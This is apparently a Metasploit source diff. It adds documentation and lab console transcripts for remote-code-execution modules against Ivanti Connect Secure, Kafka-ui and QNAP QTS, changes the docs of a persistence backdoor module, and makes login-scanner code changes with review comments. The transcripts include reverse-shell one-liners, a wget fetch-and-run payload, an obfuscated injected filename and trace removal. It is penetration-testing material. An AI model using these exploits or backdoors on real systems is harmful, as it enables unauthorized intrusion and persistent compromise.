||||
[*] 192.168.86.111 - Meterpreter session 3 closed. Reason: Died
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
|
||||
```
|
||||
|
||||
### Automatic (Unix Payload)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
|
||||
PAYLOAD => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
|
||||
|
||||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connecti
|
||||
ons
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_bash):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST eth0 yes The listen address (an interface may be s
|
||||
pecified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
|
||||
[*] 192.168.86.111:443 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
cat /home/ssl-vpn-VERSION
|
||||
export DSREL_MAJOR=22
|
||||
export DSREL_MINOR=3
|
||||
export DSREL_MAINT=1
|
||||
export DSREL_DATAVER=4802
|
||||
export DSREL_PRODUCT=ssl-vpn
|
||||
export DSREL_DEPS=ive
|
||||
export DSREL_BUILDNUM=1647
|
||||
export DSREL_COMMENT="R1"
|
||||
exit
|
||||
[*] 192.168.86.111 - Command shell session 4 closed.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
|
||||
```
|
||||
@@ -0,0 +1,224 @@
|
||||
## Vulnerable Application
|
||||
A command injection vulnerability exists in Kafka-ui between `v0.4.0` and `v0.7.1` allowing an attacker to inject
|
||||
and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section.
|
||||
|
||||
This module has been tested with Kali Linux 2023.11 on the following targets:
|
||||
* Kafka-ui v0.4.0 running on MacOS Docker Desktop
|
||||
* Kafka-ui v0.7.0 running on MacOS Docker Desktop
|
||||
* Kafka-ui v0.7.1 running on MacOS Docker Desktop
|
||||
|
||||
## Installation
|
||||
### Installation steps to install Kafka-ui
|
||||
* Install `Docker` on your preferred platform.
|
||||
* Here are the installation instructions for [Docker Desktop on MacOS](https://docs.docker.com/desktop/install/mac-install/).
|
||||
* Create a empty directory (`kafka-ui`).
|
||||
* Create the following `docker-compose.yaml` file in the directory. This will automatically create a Kafka cluster with Kafka-ui.
|
||||
* You can modify the `v0.7.0` in the `yaml` file to pull different versions.
|
||||
```yaml
|
||||
version: '2'
|
||||
|
||||
networks:
|
||||
rmoff_kafka:
|
||||
name: rmoff_kafka
|
||||
|
||||
services:
|
||||
zookeeper:
|
||||
image: confluentinc/cp-zookeeper:latest
|
||||
container_name: zookeeper
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
environment:
|
||||
ZOOKEEPER_CLIENT_PORT: 2181
|
||||
ZOOKEEPER_TICK_TIME: 2000
|
||||
ports:
|
||||
- 22181:2181
|
||||
|
||||
kafka:
|
||||
image: confluentinc/cp-kafka:latest
|
||||
container_name: kafka
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
depends_on:
|
||||
- zookeeper
|
||||
ports:
|
||||
- 29092:9092
|
||||
environment:
|
||||
KAFKA_BROKER_ID: 1
|
||||
KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
|
||||
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092,PLAINTEXT_HOST://localhost:29092
|
||||
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
|
||||
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
|
||||
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
|
||||
|
||||
kafka-ui:
|
||||
container_name: kafka-ui
|
||||
image: provectuslabs/kafka-ui:v0.7.0
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
ports:
|
||||
- 8080:8080
|
||||
depends_on:
|
||||
- kafka
|
||||
- zookeeper
|
||||
environment:
|
||||
KAFKA_CLUSTERS_0_NAME: local
|
||||
KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka:9092
|
||||
KAFKA_CLUSTERS_0_ZOOKEEPER: zookeeper:2181
|
||||
KAFKA_BROKERCONNECT: kafka:9092
|
||||
DYNAMIC_CONFIG_ENABLED: 'true'
|
||||
KAFKA_CLUSTERS_0_METRICS_PORT: 9997
|
||||
```
|
||||
|
||||
* Run following command `docker-compose up -d` to install and run the Kafka ui and cluster environment.
|
||||
* Your Kafka ui should be accessible on `http://localhost:8080` with an active Kafka cluster running.
|
||||
* You can bring down the environment for a fresh start with the command `docker-compose down --volumes`.
|
||||
|
||||
You are now ready to test the module.
|
||||
|
||||
## Verification Steps
|
||||
- [x] Start `msfconsole`
|
||||
- [x] `use exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251`
|
||||
- [x] `set rhosts <ip-target>`
|
||||
- [x] `set lhost <ip-attacker>`
|
||||
- [x] `set target <0=Unix/Linux Command>`
|
||||
- [x] `exploit`
|
||||
|
||||
you should get a `shell` or `Meterpreter`.
|
||||
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > info
|
||||
|
||||
Name: Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
|
||||
Module: exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251
|
||||
Platform: Unix, Linux
|
||||
Arch: cmd, x64, x86
|
||||
Privileged: Yes
|
||||
License: Metasploit Framework License (BSD)
|
||||
Rank: Excellent
|
||||
Disclosed: 2023-09-27
|
||||
|
||||
Provided by:
|
||||
h00die-gr3y <h00die.gr3y@gmail.com>
|
||||
BobTheShopLifter and Thingstad
|
||||
|
||||
Module side effects:
|
||||
ioc-in-logs
|
||||
artifacts-on-disk
|
||||
|
||||
Module stability:
|
||||
crash-safe
|
||||
|
||||
Module reliability:
|
||||
repeatable-session
|
||||
|
||||
Available targets:
|
||||
Id Name
|
||||
-- ----
|
||||
=> 0 Unix/Linux Command
|
||||
|
||||
Check supported:
|
||||
Yes
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
|
||||
or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
Payload information:
|
||||
|
||||
Description:
|
||||
A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing
|
||||
an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter
|
||||
at the `topic` section.
|
||||
|
||||
References:
|
||||
https://nvd.nist.gov/vuln/detail/CVE-2023-52251
|
||||
https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251
|
||||
https://github.com/BobTheShoplifter/CVE-2023-52251-POC
|
||||
|
||||
|
||||
View the full module info with the info -d command.
|
||||
```
|
||||
|
||||
## Options
|
||||
No specific options for this module.
|
||||
|
||||
## Scenarios
|
||||
### Kafka-ui v0.7.0 Unix/Linux Command - cmd/unix/reverse_netcat
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
|
||||
|
||||
[+] mkfifo /tmp/cpzbj; nc 192.168.201.8 4444 0</tmp/cpzbj | /bin/sh >/tmp/cpzbj 2>&1; rm /tmp/cpzbj
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.25:8080 can be exploited.
|
||||
[+] The target is vulnerable. Kafka-ui version: 0.7.0
|
||||
[*] Executing Unix/Linux Command for cmd/unix/reverse_netcat
|
||||
[*] Searching for active Kafka cluster...
|
||||
[+] Active Kafka cluster found: local
|
||||
[*] Creating a new topic...
|
||||
[+] New topic created: 9nQbg
|
||||
[*] Trigger Groovy script payload execution by creating a message...
|
||||
[*] Removing tracks...
|
||||
[+] Successfully deleted topic 9nQbg.
|
||||
[*] Command shell session 28 opened (192.168.201.8:4444 -> 192.168.201.25:49429) at 2024-01-20 18:44:52 +0000
|
||||
|
||||
uname -a
|
||||
Linux 889a0c5cec88 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 Linux
|
||||
id
|
||||
uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui)
|
||||
```
|
||||
### Kafka-ui v0.7.0 Unix/Linux Command - cmd/linux/http/x64/meterpreter_reverse_tcp
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
|
||||
|
||||
[*] Command to run on remote host: wget -qO /tmp/LfMsMsUxX http://192.168.201.8:1981/Qw3rZo-yo18aYrvy_AQU-w; chmod +x /tmp/LfMsMsUxX; /tmp/LfMsMsUxX &
|
||||
[*] Fetch Handler listening on 192.168.201.8:1981
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /Qw3rZo-yo18aYrvy_AQU-w
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.25:8080 can be exploited.
|
||||
[+] The target appears to be vulnerable. Kafka-ui version: 0.7.0
|
||||
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter_reverse_tcp
|
||||
[*] Searching for active Kafka cluster...
|
||||
[+] Active Kafka cluster found: local
|
||||
[*] Creating a new topic...
|
||||
[+] New topic created: D9kH687
|
||||
[*] Trigger Groovy script payload execution by creating a message...
|
||||
[*] Removing tracks...
|
||||
[*] Client 192.168.201.25 requested /Qw3rZo-yo18aYrvy_AQU-w
|
||||
[*] Sending payload to 192.168.201.25 (Wget)
|
||||
[+] Successfully deleted topic D9kH687.
|
||||
[*] Meterpreter session 29 opened (192.168.201.8:4444 -> 192.168.201.25:50355) at 2024-01-23 08:47:41 +0000
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.30.0.4
|
||||
OS : (Linux 6.4.16-linuxkit)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > getuid
|
||||
Server username: kafkaui
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
## Limitations
|
||||
No limitations.
|
||||
@@ -0,0 +1,199 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
|
||||
QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
|
||||
(NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.
|
||||
|
||||
The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
|
||||
The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
|
||||
during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
|
||||
initialized, the quick.cgi component is disabled on the system.
|
||||
|
||||
An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
|
||||
injection, allowing the attacker to execute arbitrary commands on the device.
|
||||
|
||||
### Setup
|
||||
Vulnerable firmware can be downloaded from:
|
||||
[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
|
||||
In order to decrypt the firmware use the following script:
|
||||
[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
|
||||
|
||||
Unzip the archive:
|
||||
```
|
||||
user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip
|
||||
Archive: TS-X64_20230926-5.1.2.2533.zip
|
||||
inflating: TS-X64_20230926-5.1.2.2533.img
|
||||
```
|
||||
|
||||
Decrypt the firmware:
|
||||
```
|
||||
user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
|
||||
Signature check OK, model TS-X64, version 5.1.2
|
||||
Encrypted 1048576 of all 220239236 bytes
|
||||
[99% left]
|
||||
[99% left]
|
||||
[99% left]
|
||||
...snip
|
||||
[02% left]
|
||||
[00% left]
|
||||
[00% left]
|
||||
user@dev:~/qnap/$ ls
|
||||
qnap-qts-fw-cryptor.py TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz TS-X64_20230926-5.1.2.2533.zip
|
||||
```
|
||||
|
||||
Recreate the root file system:
|
||||
```
|
||||
user@dev:~/qnap/$ mkdir firmware
|
||||
user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
|
||||
user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
|
||||
user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
|
||||
user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
|
||||
user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
|
||||
user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
|
||||
```
|
||||
|
||||
To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
|
||||
```
|
||||
user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
|
||||
```
|
||||
|
||||
Run _thttpd_ via QEMU:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$
|
||||
sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080 -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
|
||||
```
|
||||
|
||||
Verify the HTTP server is running:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
|
||||
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1195417/./qemu-x86_
|
||||
```
|
||||
|
||||
At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
|
||||
around the following issue: https://github.com/rapid7/mettle/issues/255.
|
||||
Ensure the binaries exist on your system:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
|
||||
/dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
|
||||
/dev/urandom
|
||||
```
|
||||
|
||||
Create files the files:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
|
||||
```
|
||||
|
||||
Mount the binaries:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/random dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/urandom dev/urandom
|
||||
```
|
||||
|
||||
Drop to a shell via QEMU:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
|
||||
```
|
||||
|
||||
Enable the component quick.cgi:
|
||||
```
|
||||
sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
|
||||
```
|
||||
|
||||
Fix a linker issue with QEMU:
|
||||
```
|
||||
sh-3.2# rm /lib/libnl-3.so.200
|
||||
sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
|
||||
```
|
||||
|
||||
Create this folder as it will be present in a NAS device containing a hard drive:
|
||||
```
|
||||
sh-3.2# mkdir /mnt/HDA_ROOT
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Do: `use linux/http/qnap_qts_rce_cve_2023_47218`
|
||||
1. Set the following options: `RHOST`, `RPORT`, `LHOST` and `FETCH_SRVPORT` if 8080 is already in use.
|
||||
1. Run the module
|
||||
1. Receive a Meterpreter session as the `admin` user.
|
||||
|
||||
## Scenarios
|
||||
### TS-X64_20230926-5.1.2.2533 firmware emulated via qemu using the steps above.
|
||||
```
|
||||
msf6 > use linux/http/qnap_qts_rce_cve_2023_47218
|
||||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rport 8080
|
||||
rport => 8080
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rhost 172.16.199.130
|
||||
rhost => 172.16.199.130
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set lhost 172.16.199.158
|
||||
lhost => 172.16.199.158
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set fetch_srvport 8085
|
||||
fetch_srvport => 8085
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options
|
||||
|
||||
Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 172.16.199.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasp
|
||||
loit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
|
||||
, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME mvcWDkBxSOK no Name to use on remote system when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8085 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR /mnt/update yes Remote writable dir to store payload; cannot contain space
|
||||
s.
|
||||
LHOST 172.16.199.158 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Default
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.158:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Sending stage (3045380 bytes) to 172.16.199.130
|
||||
[+] Deleted /mnt/update/RjzvVkLp
|
||||
[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9Sanp2VmtMcA==|base64 -d))"
|
||||
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.130:40004) at 2024-02-15 12:20:04 -0900
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: admin
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.199.130
|
||||
OS : (Linux 6.2.0-35-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -39,7 +39,7 @@
|
||||
2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever.
|
||||
3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
|
||||
|
||||
**SHELLPATH**
|
||||
**BACKDOOR_PATH**
|
||||
|
||||
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
|
||||
|
||||
@@ -72,15 +72,15 @@ Get initial access
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
|
||||
Install our callback service (system_v w/ chkconfig). Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.
|
||||
|
||||
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
|
||||
msf exploit(service_persistence) > set session 1
|
||||
session => 1
|
||||
msf exploit(service_persistence) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(service_persistence) > set SHELLPATH /bin
|
||||
SHELLPATH => /bin
|
||||
msf exploit(service_persistence) > set BACKDOOR_PATH /bin
|
||||
BACKDOOR_PATH => /bin
|
||||
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
|
||||
payload => cmd/unix/reverse_netcat
|
||||
msf exploit(service_persistence) > set lhost 192.168.199.128
|
||||
@@ -260,12 +260,12 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
|
||||
|
||||
Module options (exploit/linux/local/service_persistence):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SERVICE no Name of service to create
|
||||
SESSION -1 yes The session to run this module on.
|
||||
SHELLPATH /tmp yes Writable path to put our shell
|
||||
SHELL_NAME no Name of shell file to write
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BACKDOOR_PATH /tmp yes Writable path to put our shell
|
||||
SERVICE no Name of service to create
|
||||
SESSION yes The session to run this module on
|
||||
SHELL_NAME no Name of shell file to write
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_netcat):
|
||||
|
||||
@@ -47,7 +47,16 @@ module Metasploit
|
||||
# @return [Boolean] Whether to use Windows Authentication instead of SQL Server Auth.
|
||||
attr_accessor :windows_authentication
|
||||
|
||||
# @!attribute use_client_as_proof
|
||||
# @return [Boolean] If a login is successful and this attribute is true - an MSSQL::Client instance is used as proof
|
||||
attr_accessor :use_client_as_proof
|
||||
|
||||
# @!attribute max_send_size
|
||||
# @return [Integer] The max size of the data to encapsulate in a single packet
|
||||
attr_accessor :max_send_size
|
||||
|
||||
# @!attribute send_delay
|
||||
# @return [Integer] The delay between sending packets
|
||||
attr_accessor :send_delay
|
||||
|
||||
validates :windows_authentication,
|
||||
@@ -68,9 +77,14 @@ module Metasploit
|
||||
}
|
||||
|
||||
begin
|
||||
client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port)
|
||||
client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port, proxies)
|
||||
if client.mssql_login(credential.public, credential.private, '', credential.realm)
|
||||
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
if use_client_as_proof
|
||||
result_options[:proof] = client
|
||||
else
|
||||
client.disconnect
|
||||
end
|
||||
else
|
||||
result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
|
||||
end
|
||||
@@ -81,8 +95,6 @@ module Metasploit
|
||||
elog(e)
|
||||
result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
||||
result_options[:proof] = e
|
||||
ensure
|
||||
client.disconnect
|
||||
end
|
||||
|
||||
::Metasploit::Framework::LoginScanner::Result.new(result_options)
|
||||
|
||||
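Review bot: With the `ensure client.disconnect` removed in the last hunk, the only remaining `client.disconnect` is on the successful-login path when `use_client_as_proof` is false, so the `INCORRECT` branch and the rescue paths now leave the connection open unless `mssql_login` or the client closes it internally, which is not visible here. Across a long credential list that could pile up open sockets on both the scanner and the database server. I would add `client.disconnect` in the `else` branch after setting `Status::INCORRECT` and `client&.disconnect` in the rescue clauses, or keep the `ensure` as `client.disconnect unless result_options[:proof].equal?(client)`. The `use_client_as_proof` comment should also state that the caller then owns the live, authenticated client and is responsible for disconnecting it. The enclosing method starts and ends outside these hunks.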
@@ -37,9 +37,9 @@ module Metasploit
|
||||
begin
|
||||
# manage our behind the scenes socket. Close any existing one and open a new one
|
||||
disconnect if self.sock
|
||||
connect
|
||||
self.sock = connect
|
||||
|
||||
mysql_conn = ::Mysql.connect(host, credential.public, credential.private, '', port, sock)
|
||||
mysql_conn = ::Mysql.connect(host, credential.public, credential.private, '', port, io: self.sock)
|
||||
|
||||
rescue ::SystemCallError, Rex::ConnectionError => e
|
||||
result_options.merge!({
|
||||
|
||||
@@ -45,7 +45,7 @@ module Metasploit
|
||||
pg_conn = nil
|
||||
|
||||
begin
|
||||
pg_conn = Msf::Db::PostgresPR::Connection.new(db_name,credential.public,credential.private,uri)
|
||||
pg_conn = Msf::Db::PostgresPR::Connection.new(db_name,credential.public,credential.private,uri,proxies)
|
||||
rescue ::RuntimeError => e
|
||||
case e.to_s.split("\t")[1]
|
||||
when "C3D000"
|
||||
|
||||
@@ -32,7 +32,7 @@ module Metasploit
|
||||
end
|
||||
end
|
||||
|
||||
VERSION = "6.3.55"
|
||||
VERSION = "6.3.57"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
||||
@@ -228,6 +228,13 @@ class Config < Hash
|
||||
self.new.postgresql_session_history
|
||||
end
|
||||
|
||||
# Returns the full path to the MSSQL session history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
def self.mssql_session_history
|
||||
self.new.mssql_session_history
|
||||
end
|
||||
|
||||
# Returns the full path to the MySQL session history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
@@ -352,6 +359,10 @@ class Config < Hash
|
||||
config_directory + FileSep + "mysql_session_history"
|
||||
end
|
||||
|
||||
def mssql_session_history
|
||||
config_directory + FileSep + "mssql_session_history"
|
||||
end
|
||||
|
||||
def pry_history
|
||||
config_directory + FileSep + "pry_history"
|
||||
end
|
||||
|
||||
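Review bot: The new instance method `mssql_session_history` in the second hunk has no doc comment, while the class-level wrapper added in the first hunk does; I would add `# Returns the full path to the MSSQL session history file.` with `# @return [String] path to the history file.` above it. Since the file presumably records statements typed in an interactive session, which can include credentials, the comment could also note that whoever creates the file should restrict its permissions; the code that writes it is not in this section. The `Config` class body starts and ends outside both hunks.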
@@ -568,116 +568,96 @@ class ReadableText
|
||||
# @param indent [String] the indentation to use.
|
||||
# @param missing [Boolean] dump only empty required options.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_options(mod, indent = '', missing = false)
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
def self.dump_options(mod, indent = '', missing = false, advanced: false, evasion: false)
|
||||
filtered_options = mod.options.values.select { |opt| opt.advanced? == advanced && opt.evasion? == evasion }
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
option_groups = mod.options.groups.map { |_name, group| group }.sort_by(&:name)
|
||||
options_by_group = option_groups.map do |group|
|
||||
[group, group.option_names.map { |name| mod.options[name] }.compact]
|
||||
end.to_h
|
||||
grouped_option_names = option_groups.flat_map(&:option_names)
|
||||
remaining_options = filtered_options.reject { |option| grouped_option_names.include?(option.name) }
|
||||
options_grouped_by_conditions = remaining_options.group_by(&:conditions)
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
